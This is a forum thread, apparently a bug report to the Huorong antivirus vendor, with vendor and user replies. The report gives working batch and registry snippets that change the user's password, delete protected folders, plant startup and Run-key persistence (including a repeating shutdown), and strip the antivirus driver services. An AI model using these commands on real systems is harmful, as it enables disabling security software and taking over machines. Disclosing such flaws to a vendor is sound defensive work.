火绒翻车实录（完结篇）

落华无痕

安装火绒默认设置情况下（开启所有防护情况下结果可能有所出入），开启自定义防护，重启系统再进行测试。

翻车现场一，更改用户名密码

1.使用批处理样本测试，内容如下：

1. net user %username% infected

复制代码

成功拦截。

2.更改批处理代码，内容如下：

1. copy %windir%\system32\net.exe %windir%\temp\
   
2. %windir%\temp\net.exe user %username% infected
   
3. pause

复制代码

成功拦截。

3.综合前面两次结果，发现最终修改用户名的程序是net1.exe。任务管理器查看net1.exe的命令行，发现使用方法跟net.exe一样。
改进代码如下：

1. copy %windir%\system32\net1.exe %windir%\temp\
   
2. %windir%\temp\net1.exe user %username% infected
   
3. pause

复制代码

翻车！成功修改密码且火绒没反应！



翻车现场二、删除自定义防护目录

添加自定义规则保护桌面的test目录，禁止删除和执行，直接阻止。


1.正常删除和执行，成功拦截。



2.新建批处理代码如下，将test文件夹拖放到批处理上方释放。（原理：设置文件夹短文件名，用短文件名路径删除）

1. fsutil file setshortname "%1" test~1
   
2. rd /s /q %~p1test~1
   
3. pause

复制代码

翻车！成功删除目录，火绒没有反应。（个别情况下可能删除失败）

3.新建批处理代码如下，将test文件夹拖放到批处理上方释放。（原理：重命名文件夹，再删除重命名后的文件夹）

1. ren "%1" "%~n1_bak"
   
2. rd /s /q "%~p1%~n1_bak"
   
3. pause

复制代码

翻车！成功删除目录，火绒没有反应。（个别情况下可能删除失败）



翻车现场三、启动文件夹创建开机启动批处理。


1.新建批处理，代码如下：

1. echo shutdown -s -t 3 >>"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\test.bat"

复制代码

成功拦截。

2.修改批处理，代码如下：

1. ren "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" StartU
   
2. echo shutdown -s -t 3 >>"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartU\test.bat"
   
3. ren "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartU" StartUp
   
4. pause

复制代码

翻车！成功创建开机启动项！

3.修改批处理代码如下：

1. rd /s /q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
   
2. mkdir c:\windows\temp\test
   
3. echo shutdown -s -t 3 >>c:\windows\temp\test\test.bat
   
4. mklink /j "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" c:\windows\temp\test
   
5. pause

复制代码

翻车！成功创建开机启动项！如果批处理使用前面修改用户密码的方法，重启后批处理可以实现反复关机。。。



翻车现场四、创建注册表Run启动项


开启所有注册表防护项目，在用户注册表Run下创建桌面test\test.exe的启动项。

1.新建批处理代码如下：

1. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t reg_sz /d "%userprofile%\desktop\test\test.exe" /f

复制代码

成功拦截！

2.修改代码如下：

1. cd %userprofile%\desktop\test
   
2. reg save "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.hiv
   
3. reg load HKLM\Run run.hiv
   
4. reg add HKLM\Run /v test /t reg_sz /d "%userprofile%\desktop\test\test.exe" /f
   
5. reg unload HKLM\Run
   
6. echo y|reg restore "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.hiv
   
7. del /a /f run*
   
8. pause

复制代码

翻车！成功创建开机启动项！



翻车现场五、创建注册表ShellIconOverlayIdentifiers启动项

展开以下注册表项并导出ShellIconOverlayIdentifiers：

1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers

复制代码

尝试在ShellIconOverlayIdentifiers新建项：

成功拦截！

编辑导出的reg，查找：

1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

复制代码

替换：

1. HKEY_CURRENT_USER\test

复制代码

保存后双击导入（除非自定义规则，否则这步火绒不会有反应）。可以编辑test项加入要启动项目（火绒也没反应的）。

删除注册表项ShellIconOverlayIdentifiers（本该有反应，但火绒没有）。

用软件Registry Workshop在Explorer下新建符号链接ShellIconOverlayIdentifiers指向HKEY_CURRENT_USER\test\ShellIconOverlayIdentifiers。



翻车！成功创建开机启动项！

翻车现场六、虚拟机利用断电关机或PCHunter暴力重启直接干掉火绒主防驱动



尝试用批处理删除注册表，火绒拦截，后续改成用reg文件删除。


新建reg内容如下：

1. Windows Registry Editor Version 5.00
   
2. 
   
3. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\sysdiag]
   
4. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\hrwfpdrv]
   
5. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\hrdevmon]
   
6. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\HipsDaemon]
   
7. [HKEY_LOCAL_MACHINE\SYSTEM\Select]
   
8. "Current"=dword:00000002
   
9. "Default"=dword:00000002

复制代码

双击导入（火绒没有拦截），虚拟机断电关机，或pchunter暴力重启。


重启后。。。

这时候可以轻松结束残留进程和删除文件。


翻车！主防彻底挂掉。注意以上是在虚拟机下测试，实机可能不同，谁有条件的实机测试下？

内容六，可能是我虚拟机的问题，测试不能复现。补充一种。
利用PendingFileRenameOperations替换系统文件实现开机启动。有现成的样本：
谁用实验机分析一下怎么手杀这个445病毒


样本成功执行，开启所有系统防护项目的火绒没有拦截提示。


重启后。病毒成功释放rootkit程序。



翻车！病毒成功执行。

QWEASDZXCRFV

您好, 您反馈的问题:
问题2已确认是bug，bugid:27813
问题3、4、5:问题确认，测试后会在近期更新防御规则拦截
问题6:断电关机测试未能复现，PChunter可以使用执行控制进行拦截.

感谢您的反馈~

zay365

http://bbs.huorong.cn/thread-66524-1-1.html
重命名这点之前好像有人提到过

zhaublitz

1-3和3-2可以复现
但是2-2我这边测试可以正常拦截。

落华无痕

zhaublitz 发表于 2020-8-25 10:30
1-3和3-2可以复现
但是2-2我这边测试可以正常拦截。

是的，这个很奇怪。我一开始测试不能拦截，后面又测试一次像你这样拦截了，再次测试又不拦截。
不知道哪个步骤出问题了。所以我说个别情况下可能失败。
又测试了一遍不拦截。。。我很肯定之前有一次像你这样能拦截的，所以我才保留怀疑。
附上视频录像：
https://www.lanzoux.com/iUImLg14xkj

MagicFuzzX

good job

tianhu3

@火绒工程师

gqy

你们真的闲的难受啊这都能挖掘出来

火绒工程师

您好，根据您反馈的问题回复如下：问题一，对系统文件改名或移动后执行危险动作的情况，主防只针对单点的高危动作进行防御，所以暂时此类情况不支持拦截，如果存在病毒通用行为，后续会考虑添加恶意行为分析进行拦截，如果是少量零散样本暂时会以查杀为主。 问题二，您提到的自定义防护规则问题，与问题一类似，主防只针对单点的高危动作进行防御，所以暂时不支持拦截，如果您发现有病毒利用此种方式执行恶意行为的情况，可以向我们上传相关样本。 问题三 和 问题四 需要相关技术人员确认后进行酌情处理。感谢您的反馈，我们会继续跟进此问题~

vm001

火绒工程师 发表于 2020-8-25 15:58
您好，根据您反馈的问题回复如下：问题一，对系统文件改名或移动后执行危险动作的情况，主防只针对单点的高 ...

嗯，火绒是保卫电脑系统，军队是保护国家安全，近几年没见哪个国家来侵略中国，国家还研发这个那个，养那么多军队有啥用，应该学习火绒这种思想，等到威胁到来或者有老百姓反应被XX了在招军队也不迟。

wwwab

vm001 发表于 2020-8-25 16:18
嗯，火绒是保卫电脑系统，军队是保护国家安全，近几年没见哪个国家来侵略中国，国家还研发这个那个，养那 ...

这肯定不一样啊，杀毒软件之所以杀毒软件，有毒给他他才能杀，先有病毒才会诞生杀毒软件，有了新的病毒杀毒软件才能加库，不像啥军队可以提前准备好的啊，杀毒软件本来就是这样的嘛。虽然说主防是新型未知病毒的最后一道防线，但是杀毒软件怎么去防都有自己的见解，这是一项技术，这就像语文题目，有两面性，你看他是坏的，不一定就没人没道理看他是好的，既然目前他们那边见解这样那就这样呗